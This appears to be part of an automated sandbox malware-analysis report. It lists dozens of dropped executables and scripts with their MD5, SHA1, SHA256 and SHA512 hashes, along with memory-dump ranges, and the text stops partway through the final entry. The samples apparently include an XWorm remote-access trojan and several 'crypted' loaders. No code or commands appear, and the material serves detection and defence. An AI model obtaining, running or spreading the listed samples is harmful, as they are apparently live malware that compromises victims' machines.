memory/3084-419-0x00000000008B0000-0x0000000000F3E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\PdwGGa0lF9fa.bat
| MD5 | 5783bbc276bf962a011ed5029948c8de |
| SHA1 | d9e5580b98affc8155344b04207c4d9a2a311bf4 |
| SHA256 | f1617ed867ff81f00d332ea768e0317c457de2213a37397cd5b55f581e29c477 |
| SHA512 | 1df96a225c1c499771a659f4b8273e80340bd38a99db53a75a0788b14254cb74231ff0939d4bbd5af7027327085f6c3506c992fecdf15822c5eb6199fcbb1bfe |
memory/2372-430-0x0000000000400000-0x0000000000735000-memory.dmp
memory/3084-434-0x00000000008B0000-0x0000000000F3E000-memory.dmp
C:\Users\Admin\Desktop\a\filer.exe
| MD5 | 9096f57fa44b8f20eebf2008a9598eec |
| SHA1 | 42128a72a214368618f5693df45b901232f80496 |
| SHA256 | f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934 |
| SHA512 | ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2 |
C:\Users\Admin\Desktop\a\AmLzNi.exe
| MD5 | 73507ed37d9fa2b2468f2a7077d6c682 |
| SHA1 | f4704970cedac462951aaf7cd11060885764fe21 |
| SHA256 | c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6 |
| SHA512 | 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369 |
memory/2372-462-0x0000000000400000-0x0000000000735000-memory.dmp
memory/392-470-0x000001B596070000-0x000001B596092000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 57f919cd859abb1ef2bff85abeefcce4 |
| SHA1 | 1d1331ba9485b10622cc498a03475445cdaf1eb3 |
| SHA256 | 020807a7fd353e26e7773244edc05561c66d966536c7d14704a33f34896a275f |
| SHA512 | 9f0bbda5db8483b6559fb28d9ded1ec22c717f26fde6f34baf5dd483a1e556e749a5737c6a90422b9615c60b5258aaec4a6beda376926451ee5a57f359316c29 |
C:\Users\Admin\AppData\Local\Temp\1SiI4Zkx6p69.bat
| MD5 | aa9f725a8d55bdad824ba403493c5820 |
| SHA1 | 08e26cde9f9d8de49a20969c3423626e129776e3 |
| SHA256 | 45cbb04727d083de65e99e85567602b72121e5dec863bd7d53627ace9f99a83f |
| SHA512 | f43e97fa4e756b7fdb7ff9fdb2f5e919a43c38679d2d8a5663d7895bed6a0a7f4ccb72d79dce35331de9381cce0f8855176132c478b71a274fd9d1eb5a2a58b8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ddfca02d5654e461612d188a94beeed5 |
| SHA1 | 039ebb001a80ff78bbd7e4690bc2d6fe5f39f7a5 |
| SHA256 | 8936ca7c447a89088498b0c5fbac6a594b05618ab6051a0f659451f46f90a5cb |
| SHA512 | 8a7da70bdae42da69ba6c2818dd12578c80f400e4e24c22aae42d0114c7d02353f2226442c179d695343ca40b80e4ed0cb30348f1af7b60377f786cb9825c0e4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
memory/392-498-0x000001B5AE740000-0x000001B5AE88F000-memory.dmp
memory/2300-497-0x0000017BC2A10000-0x0000017BC2B5F000-memory.dmp
memory/1004-510-0x000001ABF6920000-0x000001ABF6A6F000-memory.dmp
memory/3628-511-0x00007FF67B220000-0x00007FF67CC41000-memory.dmp
memory/2372-514-0x0000000000400000-0x0000000000735000-memory.dmp
memory/3628-519-0x00007FF67B220000-0x00007FF67CC41000-memory.dmp
memory/2372-520-0x00000000009E0000-0x0000000000A82000-memory.dmp
C:\Users\Admin\Desktop\Files\xxz.exe
| MD5 | deec0a7c5e6af53603b0171a0d7d5174 |
| SHA1 | 15600a4e91ad83e4351c7a6a87e9102bb5998459 |
| SHA256 | df22795e42488daabc77eeb96f724ea6df453ed2ebcae81db03993b560ed5ab3 |
| SHA512 | e2809515a7ab66461144bcb746d16004df682cc93c92ee6874b876bc1307d62056ce780468ed179c782cf20027bfba4ca3867a04da6785e399eee0cbabeaf40a |
memory/1724-535-0x000001C3C5970000-0x000001C3C5990000-memory.dmp
memory/2372-538-0x0000000000400000-0x0000000000735000-memory.dmp
C:\Users\Admin\Desktop\a\screenshot_0.png
| MD5 | 2c2e819c7276db6c9cd361799587d713 |
| SHA1 | 0629aeae87432b389ea90aa935975474fcb07dad |
| SHA256 | a5c1ac87a7e352234c9012f0f321bc34c432c68cdb62d4a3f264825982f6dd55 |
| SHA512 | 7d8164a1a31cb9ca4a5b0c4d9ee11326090578a530a3a82d87aceb09e3f798138e1fc932c2c0782cbb2027cf76d9783fe4b670ef07e7a6eef1685399410d578e |
memory/2372-544-0x0000000000400000-0x0000000000735000-memory.dmp
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | fa1da04151bfd4c8941cfef82ec29465 |
| SHA1 | 4c10fea6737cbd1b76955358346b260485582fee |
| SHA256 | 564bd60d615949829fd903353b437a5c73bd2612c20eb1e4972377859911342f |
| SHA512 | 597a59f68e1a5d47ee787fc04d4c25af5948458ef60786a7f3a602922ff26ed928d84dc4394048b7da909df1e7ab175be8c674cd4e7f0fb3f3940b8062a45f49 |
C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe
| MD5 | 3273f078f87cebc3b06e9202e3902b5c |
| SHA1 | 03b1971e04c8e67a32f38446bd8bfac41825f9cc |
| SHA256 | 4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c |
| SHA512 | 2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9 |
memory/4632-560-0x000001E6953A0000-0x000001E696288000-memory.dmp
C:\Users\Admin\Desktop\a\XClient.exe
| MD5 | ce69d13cb31832ebad71933900d35458 |
| SHA1 | e9cadfcd08d79a2624d4a5320187ae84cf6a0148 |
| SHA256 | 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf |
| SHA512 | 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409 |
memory/652-573-0x00000000004E0000-0x00000000004EE000-memory.dmp
C:\Users\Admin\Desktop\a\333.exe
| MD5 | b73ecb016b35d5b7acb91125924525e5 |
| SHA1 | 37fe45c0a85900d869a41f996dd19949f78c4ec4 |
| SHA256 | b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d |
| SHA512 | 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d |
memory/420-588-0x0000000036720000-0x0000000036730000-memory.dmp
C:\Users\Admin\Desktop\a\VBVEd6f.exe
| MD5 | 4ea576c1e8f58201fd4219a86665eaa9 |
| SHA1 | efaf3759b04ee0216254cf07095d52b110c7361f |
| SHA256 | d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f |
| SHA512 | 0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494 |
memory/2076-598-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\Desktop\a\test12.exe
| MD5 | 5853f8769e95540175f58667adea98b7 |
| SHA1 | 3dcd1ad8f33b4f4a43fcb1191c66432d563e9831 |
| SHA256 | d58fee4abb20ce9214a9ed4ae8943a246a106bbe4f2b5332754c3b50ce7b0995 |
| SHA512 | c1393a51eea33279d86544c6c58b946ae909540a96edda07c19e21a24e55c51be34e45413aa5005e9aeedacbb7d38471027baa27c18dbc36a8359856da1a0d80 |
C:\Users\Admin\Desktop\a\test6.exe
| MD5 | 6383ec21148f0fb71b679a3abf2a3fcc |
| SHA1 | 21cc58ccc2e024fbfb88f60c45e72f364129580f |
| SHA256 | 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde |
| SHA512 | c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125 |
memory/1316-618-0x0000000000A30000-0x0000000000A84000-memory.dmp
C:\Users\Admin\Desktop\a\test14.exe
| MD5 | f299d1d0700fc944d8db8e69beb06ddd |
| SHA1 | 902814ffd67308ba74d89b9cbb08716eec823ead |
| SHA256 | b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406 |
| SHA512 | 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca |
memory/2452-628-0x0000000000970000-0x00000000009C4000-memory.dmp
memory/2452-629-0x0000000000CE0000-0x0000000000D41000-memory.dmp
memory/2452-630-0x0000000000080000-0x0000000000083000-memory.dmp
C:\Users\Admin\Desktop\Files\taskhost.exe
| MD5 | 3296704171fe01c0fc4fcdd02f2695ca |
| SHA1 | e0bd82f06d94c0e32d7f6bb9f80f57f8e73a84be |
| SHA256 | b8c65f4588d2d9b76823e7ad22b71a3717792a505a4048314cb2ccba9a976e26 |
| SHA512 | 8d1583be1930e1f819149a1a5b57ec5187b08eefe8dc306f6dc74506dd25c85a60b2b282c420060d1854c36fc8642f0754708fd87dd97ed19f2229c76334837b |
C:\Users\Admin\Desktop\a\pantest.exe
| MD5 | 312f2c6630bd8d72279c8998acbbbeba |
| SHA1 | 8f11b84bec24f586a74d1c48d759ee9ec4ad9d54 |
| SHA256 | 706dccc82df58b5d49a8bcccc655a9dce0d47410bc922eb9a91108e5a1f82cfb |
| SHA512 | ed7eba574b4d6a07c582148583ed0532293366d15b5091580c6ddf9a45ed78a185163b2b713e77957cd99b03353ea8f778c8de50075b9d2924358b431fc0b37d |
memory/3356-648-0x0000000000A00000-0x0000000000A16000-memory.dmp
memory/3936-655-0x0000000000CA0000-0x0000000000CF4000-memory.dmp
C:\Users\Admin\Desktop\a\test9.exe
| MD5 | d399231f6b43ac031fd73874d0d3ef4d |
| SHA1 | 161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2 |
| SHA256 | 520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f |
| SHA512 | b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400 |
memory/2372-665-0x0000000000400000-0x0000000000735000-memory.dmp
memory/680-667-0x0000000000970000-0x00000000009C4000-memory.dmp
C:\Users\Admin\Desktop\a\test10-29.exe
| MD5 | 6b0255a17854c56c3115bd72f7fc05bd |
| SHA1 | 0c5e1dfa655bcbb3ffad8e0e4471c41255de1dd5 |
| SHA256 | ce94cf176e146813c922782ded112003e45749cb07bb7c635241c1c39e54a36a |
| SHA512 | fac0df5995a050653aa160e2e7fb8275b5c5471ce8fad9fee7c97beda37a96c27b1a3ff4de5b35e164378e3abed7df0998f6117aabb45e7eb46841e02617d1c1 |
C:\Users\Admin\Desktop\a\test19.exe
| MD5 | 5a6d9e64bff4c52d04549bbbd708871a |
| SHA1 | ae93e8daf6293c222aa806e34fb3a209e202b6c7 |
| SHA256 | c2c06c7b68f9ac079a8e2dcab3a28df987613ec94dbb0b507da838de830dcaa8 |
| SHA512 | 97a2003e27257a4b4f2493b5f8e7d0d22ff539af4be3bc308fd2c3c3e0cff1bcbc222c26d8a01a1ccbf99d4c30403b464a8660dd340afe9d6d54b31651abf05a |
C:\Users\Admin\Desktop\a\test10.exe
| MD5 | 0f0e9f3b9a70d62ae4bc66a93b604146 |
| SHA1 | e516287a1a99aac6c296083a4545a6a6981a9352 |
| SHA256 | f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda |
| SHA512 | 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881 |
C:\Users\Admin\Desktop\a\test_again4.exe
| MD5 | b84e8b628bf7843026f4e5d8d22c3d4f |
| SHA1 | 12e1564ed9b706def7a6a37124436592e4ad0446 |
| SHA256 | b01b19c4d71f75f9ec295958a8d96a2639d995c20c133f4ffda2a2dabe8a7c28 |
| SHA512 | 080aa4ad9094f142aa0eae3ae3d4bce59d61d8b5664d397268316f3c19fa4a7c161acf522adc8da5f6413a9327915f99ecdfe568b84300a9b31e42eb625ed0cd |
C:\Users\Admin\Desktop\a\test23.exe
| MD5 | 956ec5b6ad16f06c92104365a015d57c |
| SHA1 | 5c80aaed35c21d448173e10b27f87e1bfe31d1eb |
| SHA256 | 8c3924e850481889d5423eb7131833b4e828bf289d3f1eb327d491cb85a30d61 |
| SHA512 | 443cd7b6763c1d9be3fbc061f015ba2298f664f70b908ae45e7db04019173a9288d6d30068300788a2bcd2aa694811094bfcb959e127fedb7da9cd042827e1d2 |
C:\Users\Admin\Desktop\a\test5.exe
| MD5 | c8ac43511b7c21df9d16f769b94bbb9d |
| SHA1 | 694cc5e3c446a3277539ac39694bfa2073be6308 |
| SHA256 | cb1eee26a7d2050feb980eccb69d35c05b5a0d28821972df19d974b386d9e4fe |
| SHA512 | a9c7cf19857b9600e77d14d06c3774e38c6e04d2a72d119273216cc2ab9242b583b5ce5a6829fcf1e1553865088d628c82be827d8cc322e4e97c24a5ddc04628 |
C:\Users\Admin\Desktop\a\test11.exe
| MD5 | 2340185f11edd4c5b4c250ce5b9a5612 |
| SHA1 | 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727 |
| SHA256 | 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031 |
| SHA512 | 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c |
C:\Users\Admin\Desktop\a\test20.exe
| MD5 | 153a52d152897da755d90de836a35ebf |
| SHA1 | 8ba5a2d33613fbafed2bb3218cf03b9c42377c26 |
| SHA256 | 10591da797b93e3607264825685f76d6327f4463bf21953e66600abc6550b213 |
| SHA512 | 3eb53a80e68efd134945b9e770166bad2147645bef7db41f585a7a1e9c7def45ff035bd91bad87b1daef3c6833c2f17a2c0fb33183a3c9327b40ccf59be45240 |
C:\Users\Admin\Desktop\a\test_again3.exe
| MD5 | e501f77ff093ce32a6e0f3f8d151ee55 |
| SHA1 | c330a4460aef5f034f147e606b5b0167fb160717 |
| SHA256 | 9e808115bf83004226accb266fcbc6891f4c5bc7364d966e6f5de4717e6d8ed1 |
| SHA512 | 845548058034136bb6204ae04efcb37c9e43187c2b357715fcfd9986614095a0fcf1e103ab8d9f566dedb34a033f9f30a346cbdf9ee2e262dd8a44d5eaf72af2 |
C:\Users\Admin\Desktop\a\test16.exe
| MD5 | 9f88e470f85b5916800c763a876b53f2 |
| SHA1 | 4559253e6df6a68a29eedd91751ce288e846ebc8 |
| SHA256 | 0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a |
| SHA512 | c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d |
C:\Users\Admin\Desktop\a\test13.exe
| MD5 | 44c1c57c236ef57ef2aebc6cea3b3928 |
| SHA1 | e7135714eee31f96c3d469ad5589979944d7c522 |
| SHA256 | 4c3618c90ca8fac313a7868778af190a3c22c8c03132505283b213da19ce9b7f |
| SHA512 | 99d0a428082d19bb28327698e8a06f78eee5a23134f037a4357c1ac4a6c9bb7d6ad454f28a2a546e8c7770423c64d6d951a074cd40711bc1bdcd40e59919934d |
C:\Users\Admin\Desktop\a\test_again2.exe
| MD5 | 52a2fc805aa8e8610249c299962139ed |
| SHA1 | ab3c1f46b749a3ef8ad56ead443e26cde775d57d |
| SHA256 | 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea |
| SHA512 | 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf |
C:\Users\Admin\Desktop\a\test15.exe
| MD5 | 80e217c22855e1a2d177dde387a9568f |
| SHA1 | c136d098fcd40d76334327dc30264159fd8683f8 |
| SHA256 | 0ef39ccad2c162a5ab7dc13be3bba8f898fb38ba2f7357e840bd97456537decd |
| SHA512 | 6f658863ee676a07df7bbfc7b8a60bc591a6e8bf21c6f7147772e0b9beb223310c32da7436c202a4e804ce9e32128ec360618c3b273105e0f948d72859adc686 |
C:\Users\Admin\Desktop\a\test18.exe
| MD5 | a694c5303aa1ce8654670ff61ffda800 |
| SHA1 | 0dbc8ebd8b9dd827114203c3855db80cf40e57c0 |
| SHA256 | 994d0670d75433df8e0f2cce833d19d3045d3527143ce2ccf4cb4c04d4157a62 |
| SHA512 | b15856b54a018a71e71637e47e00b1c64154e24ae4c2a671dca25c43bccf4bbbf9da4445b6a7d48f62cab7da06c30fdd884d4bba21c5929a9569db0a288d9d9a |
C:\Users\Admin\Desktop\a\test21.exe
| MD5 | 3b8e201599a25cb0c463b15b8cae40a3 |
| SHA1 | 4a7ed64c4e1a52afbd21b1e30c31cb504b596710 |
| SHA256 | 407f4efed0f09c97d226da99b030bf628fcd9a2f8ee1416c1f4f1bd482d372a8 |
| SHA512 | fb5af97c3b5784ebdd3988179e970d9462aec283a41301f50f3cf31537538cef5e7534c6bb44b28ab5e1807ac85afb9490b6c30014ce9eb207030c3096921ac7 |
C:\Users\Admin\Desktop\a\test22.exe
| MD5 | e1c3d67db03d2fa62b67e6bc6038c515 |
| SHA1 | 334667884743a3f68a03c20d43c5413c5ada757c |
| SHA256 | 4ab79ee78e0abe5fff031d06a11f1de1a9e0c935097e1b829ad3e8b077700936 |
| SHA512 | 100c775bcf6ce70a82cb18884e1ca50f3cdd0be1b9f4f835e6c41c9820ff42c4fe3ca3d1fdc41d4f2e0f26dda5e5b85b3f555b88f11b58c5e81267706cafa3d7 |
C:\Users\Admin\Desktop\a\test8.exe
| MD5 | cae51fb5013ed684a11d68d9f091e750 |
| SHA1 | 28842863733c99a13b88afeb13408632f559b190 |
| SHA256 | 67256a1f764ec403d8a1bcb009e701069b815db72869eae0b59dab1f23ebc8e8 |
| SHA512 | 492961ea16f34bafa9e8695eeffef94cc649e29d7ad9da8c02b4bc49c33878cf9d75d6cdb69f7ad6713f6e5296750bd52dc08b70cd6e6c0ad963de6ca87f0ec6 |
C:\Users\Admin\Desktop\a\test7.exe
| MD5 | 2734a0771dc77ea25329ace845b85177 |
| SHA1 | 3108d452705ea5d29509b9ffd301e38063ca6885 |
| SHA256 | 29cfae62adef19cd2adf20e32908289270ebd3bdd52b407818b8f641bfb1314a |
| SHA512 | c400274d6682ad4dfae87fa53a272f3210262e083d6a966ce49711438b8e3a49ff0110e0d2b18007db8bbab54b8f8e4f0e18ba579a0f33b470e14324c3bc637b |
C:\Users\Admin\Desktop\a\test-again.exe
| MD5 | d9fd5136b6c954359e8960d0348dbd58 |
| SHA1 | 44800a8d776fd6de3e4246a559a5c2ac57c12eeb |
| SHA256 | 55eb3a38362b44d13ae622cc81df37d1d7089c15f6608fd46543df395569e816 |
| SHA512 | 86add0c5fd4d7eff19ce3828c2fe8501d51566cad047d7e480acf3e0bc227e3bda6a27aa65f7b2fd77d34cd009de73c98014d0323d8cf35ba06e5451eee5e9b0 |
C:\Users\Admin\Desktop\a\test17.exe
| MD5 | c821b813e6a0224497dada72142f2194 |
| SHA1 | 48f77776e5956d629363e61e16b9966608c3d8ff |
| SHA256 | bc9e52cd6651508e4128eb5cc7cab11825b0cb34d55d8db47b2689c770c1b0b1 |
| SHA512 | eab0164d5946a04e63dc05f26c4ed27d8fff36019a0faf46f8a548e304a5525a474eee37cb655600ac95bb16535cf74417056e931adff36c09203a192d83c676 |
C:\Users\Admin\Desktop\a\vg9qcBa.exe
| MD5 | 20160349422aeb131ed9da71a82eb7ab |
| SHA1 | bb01e4225a1e1797c9b5858d0edf063d5f8bc44f |
| SHA256 | d8f6ce51eba058276c4722747655b68711682afc5654414e8c195ada38fdc0ea |
| SHA512 | 907f3f61ac9ebeda534b3a330fd8673e8d09b243847b6a7a8d8d30f74ba8c699eafb8338a8d4f36824871609c1f226cb4db1e4a931fdf312f0e4331e7110c6b8 |
C:\Users\Admin\Desktop\Files\LoadNew.exe
| MD5 | 414753e6caa05ca4a49546cec841ef10 |
| SHA1 | 998c0b4533f3e00eeacf441fbe29575198a574d4 |
| SHA256 | 5b9ed73fd7af6b0f9625ff30b925c84905e76b694a37e41d6207626b2fc3d2f6 |
| SHA512 | c6f1476229c6587d7209455cbba42f1eb44b72b14842a60b446ab8252330c3f47d332f95645136493dfe07f8f00e4064bf6f789149e9dec0807024f5effdf4a7 |
C:\Users\Admin\Desktop\Files\OneDrive.exe
| MD5 | 1b99f0bf9216a89b8320e63cbd18a292 |
| SHA1 | 6a199cb43cb4f808183918ddb6eadc760f7cb680 |
| SHA256 | 5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357 |
| SHA512 | 02b7f410c6ccfd7d43159287424916a310b7e82c91cdb85eaeade16cf5614265a8bdcce8e6dcc2240ea54930cfb190f26ada3d5c926b50617a9826197f9cf382 |
memory/5144-982-0x0000026109E10000-0x0000026109F5A000-memory.dmp
memory/5144-983-0x0000026124FC0000-0x00000261250C6000-memory.dmp
C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe
| MD5 | 795197155ca03f53eed7d90a2613d2a7 |
| SHA1 | e177b0c729b18f21473df6decd20076a536e4e05 |
| SHA256 | 9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf |
| SHA512 | 4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b |
memory/5144-2079-0x00000261243F0000-0x0000026124470000-memory.dmp
memory/5144-2080-0x0000026124320000-0x000002612436C000-memory.dmp
memory/1084-2081-0x00000000009F0000-0x0000000000A92000-memory.dmp
C:\Users\Admin\Desktop\Files\25072023.exe
| MD5 | a9a37926c6d3ab63e00b12760fae1e73 |
| SHA1 | 944d6044e111bbad742d06852c3ed2945dc9e051 |
| SHA256 | 27955c80c620c31df686ccd2a92bce1d07e97c16fda6bd141812e9b0bdd7b06b |
| SHA512 | 575485d1c53b1bf145c7385940423b16089cf9ab75404e2e9c7af42b594480470f0e28dadcddbd66e4cd469e45326a6eb4eb2362ccc37edb2a956d224e04cf97 |
memory/5724-2109-0x0000000000C70000-0x0000000000CC2000-memory.dmp
C:\Users\Admin\Desktop\Files\PctOccurred.exe
| MD5 | 31f04226973fdade2e7232918f11e5da |
| SHA1 | ff19422e7095cb81c10f6e067d483429e25937df |
| SHA256 | 007c6dfe4466894d678c06e6b30df77225450225ddd8e904e731cab32e82c512 |
| SHA512 | 42198fc375993a09da3c8a2766ee6831cf52ff8cd60b3eb4256a361afa6963f64a0aff49adb87c3b22950e03c8ef58a94655959771f8d2d5b754012706220f66 |
C:\Users\Admin\Desktop\Files\crypted8888.exe
| MD5 | 031836b5b4c2fc0ba30f29e8a936b24e |
| SHA1 | adc7e7ec27f548afd50fac684c009cfe5c2e0090 |
| SHA256 | bf4f27f6932ce75b1746f5364af3abacbdafa59913da513a168d86ea0ad3a3a4 |
| SHA512 | ac58ed6b9a3ce4c35366e99e72e4ee1c87048a11979c91f69740d49b3c1f4f4dc3cbaa66287c73530806b8359933e7b6df0bbab01bc3dd4f351988a6a3cd3b6d |
memory/6776-2171-0x00000000004C0000-0x00000000004F8000-memory.dmp
C:\Users\Admin\Desktop\a\win.exe
| MD5 | 73e0321f95791e8e56b6ae34dd83a198 |
| SHA1 | b1e794bb80680aa020f9d4769962c7b6b18cf22b |
| SHA256 | cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b |
| SHA512 | cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc |
C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe
| MD5 | 569720e2c07b1d34bac1366bf2b1c97a |
| SHA1 | d0c7109e04b413f735bf034ce2cb2f8ee9daa837 |
| SHA256 | 0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451 |
| SHA512 | fa83ba4e0b1fa1f746e0ff94cb8f6e4ed9c841c66cc661c6fd28d30919ae657425fe0bb77319cf328a457600e364147c6e9d9140548a068a18a7e2ca0a3a2436 |
C:\Users\Admin\Desktop\a\x4lburt.exe
| MD5 | 96a7b754ca8e8f35ae9e2b88b9f25658 |
| SHA1 | ed24a27a726b87c1d5bf1da60527e5801603bb8e |
| SHA256 | 21d262741b3661b4bf1569f744dc5b5e6119cfa4f0748b9c0fa240f75442cc50 |
| SHA512 | facb2e44f5a506349710e9b2d29f6664357d057444a6bd994cf3901dee7bea471247b47496cc4480f1ad2fac4b1867117072ea7a0bfa83d55ced4e00dda96745 |
memory/6384-2245-0x0000000000830000-0x0000000000956000-memory.dmp
memory/6384-2246-0x0000000004EC0000-0x0000000004EE6000-memory.dmp
memory/5144-2301-0x0000026125420000-0x0000026125474000-memory.dmp
memory/5144-2304-0x00000261256F0000-0x000002612571C000-memory.dmp
C:\Users\Admin\Desktop\Files\postbox.exe
| MD5 | c53bb047b93851b66fead144d7c46ff3 |
| SHA1 | 42ef9d0a7efe477fabd290d16c30c63f5f576cd1 |
| SHA256 | 54092d2fb30f9258ab9817de3b886997dbefdee2963b4d051b70c0309aea99e6 |
| SHA512 | 7060e10d60d0699c7c06012a3e2be44f859ec06ec00bbd51331b5ac5169e88d14baf7949d2cd40bcebe42016f8a7d5a28a11c755a54675f5715dbee34cfc11a6 |
memory/5144-2395-0x0000026123B10000-0x0000026123B1E000-memory.dmp
memory/5144-2396-0x0000026123B20000-0x0000026123B2E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe
| MD5 | 299dfc974181983f70d3197318849008 |
| SHA1 | 913085466ab9a0ce2930017a395afab47cee817f |
| SHA256 | 760aa9c67bc1e2339e26a884bad88256e263c3762d8ca5d3c967bcc959635a1b |
| SHA512 | 2c53cbc0f296eaa1dc85b8cdf504863656d7f9707c44b2c65785a007beb609db270707e3b8059dac2d173892bd293521f5e0698b8f5353bdc9630dab1c091984 |
C:\Users\Admin\AppData\Local\Temp\iazsfn.exe
| MD5 | 695d3e9e795bc4164a7f0de0f066b7aa |
| SHA1 | 704b380393e1726c1a8382c7c0b0c2162d52e8db |
| SHA256 | 12e05a6a44e880f6d6816742ea5486d1fae93a63449a4cea07467ae5222b5f4c |
| SHA512 | 9d077c6ba9b153622dcd13d021e770920aaca038bdca307dd32fefeb388af46348bdb357916bed0f6e260960ad8edafc5ba942bdf5cd2dee90b2892f8169361a |
memory/5920-2420-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/6044-2422-0x0000000000030000-0x00000000005B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Updater.vbs
| MD5 | a4e919451b35d793876fc4342a084d1d |
| SHA1 | b543601da91bdd3025a4e7e62f6d2760ce72256e |
| SHA256 | 686b9602f1fba6bdd076bd6faeb9bc1d37fb03ac45ba3f7ed2e44e47a50c02a2 |
| SHA512 | 2d6ffe66f152ae89bddae8f705430f8c540b89e3e6d4dccfbc345b68e170cc8f3134da873ff8b76e83ab1b30f63605595d73a502a66ababd1cf4bfa881804a35 |
memory/5144-2442-0x0000026123B60000-0x0000026123C80000-memory.dmp
memory/6384-2446-0x00000000074B0000-0x00000000074CA000-memory.dmp
memory/6384-2447-0x0000000007CD0000-0x0000000007CD6000-memory.dmp
memory/2076-2460-0x0000000000400000-0x000000000066D000-memory.dmp
memory/6512-2461-0x000002357C3D0000-0x000002357C95C000-memory.dmp
memory/5144-2464-0x0000026127400000-0x0000026127750000-memory.dmp
memory/6512-2463-0x000002357D560000-0x000002357D798000-memory.dmp
C:\Users\Admin\Desktop\Files\pp.exe
| MD5 | 08dafe3bb2654c06ead4bb33fb793df8 |
| SHA1 | d1d93023f1085eed136c6d225d998abf2d5a5bf0 |
| SHA256 | fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700 |
| SHA512 | 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99 |
memory/6512-3567-0x000002357D7A0000-0x000002357D952000-memory.dmp
memory/6536-3609-0x0000000000400000-0x00000000005D8000-memory.dmp
C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe
| MD5 | eb89a69599c9d1dde409ac2b351d9a00 |
| SHA1 | a708e9a84067fd6c398ddfd0ac11ae48d9c41e4c |
